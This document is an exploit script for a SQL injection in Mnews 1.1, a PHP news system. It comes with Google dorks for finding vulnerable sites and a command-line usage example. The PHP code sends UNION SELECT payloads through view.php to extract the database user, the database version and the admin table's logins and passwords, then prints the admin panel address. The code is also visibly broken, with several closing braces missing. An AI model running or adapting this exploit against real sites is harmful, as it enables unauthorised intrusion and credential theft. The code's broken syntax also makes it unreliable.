# Exploit Title: Mnews <= 1.1 SQL Injection
# Google Dork: inurl:mnews/view.php
# Google Dork: intitle:"Mnews sistena de news"
# Date: 03rd 06 2012
# Software Link: http://phpbrasil.com/script/eo4aWVV_zFd/mnews-sistema-de-noticias
# Version: 1.1
# Tested on: Debian GNU/Linux,Windows 7 Ultimate

$ php mnews.php http://target.com/scripts/mnews/


@ini_set("default_socket_timeout", 30);
function hex($string){
    $hex=''; // PHP 'Dim' =]
    for ($i=0; $i < strlen($string); $i++){
        $hex .= dechex(ord($string[$i]));
    return '0x'.$hex;

echo "\nMnews <= 1.1 SQL Injection exploit\n";
echo "Discovered and written by WhiteCollarGroup\n";
echo "www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n";

if($argc!=2) {
	echo "Usage: \n";
	echo "php $argv[0] <target url>\n";
	echo "Example:\n";
	echo "php $argv[0] http://www.website.com/mnews\n";

$target = $argv[1];
if(substr($target, (strlen($target)-1))!="/") {
	$target .= "/";
$inject = $target . "view.php?id=-0'%20";

$token = uniqid();
$token_hex = hex($token);

echo "[*] Trying to get informations...\n";
$infos = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", user(), ".$token_hex.", version(), ".$token_hex."),3,4,5-- "));
$infos_r = array();
preg_match_all("/$token(.*)$token(.*)$token/", $infos, $infos_r);
$user = $infos_r[1][0];
$version = $infos_r[2][0];
if($user) {
	echo "[*] MySQL version: $version\n";
	echo "[*] MySQL user: $user\n";
} else {
	echo "[-] Error while getting informations.\n";

echo "[*] Getting users...\n";
$i = 0;
while(true) {
	$dados_r = array();
	$dados = file_get_contents($inject.urlencode("union all select 1,concat(".$token_hex.", login, ".$token_hex.", senha, ".$token_hex."),3,4,5 from admin limit $i,1-- "));
	preg_match_all("/$token(.*)$token(.*)$token/", $dados, $dados_r);
	$login = $dados_r[1][0];
	$senha = $dados_r[2][0];
	if(($login) AND ($senha)) {
		echo "-+-\n";
		echo "User: $login\n";
		echo "Pass: $senha\n";
	} else {

echo "-+-+-\n";
if($i!=0) {
	echo "[!] Admin login: {$target}gerencia/\n";
} else {
	echo "[-] Exploit failed. Make sure that's server is using a valid version of Mnews without Apache mod_security.\nWe're sorry.";
echo "\n";
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Mnews <= 1.1 (view.php) SQL Injection
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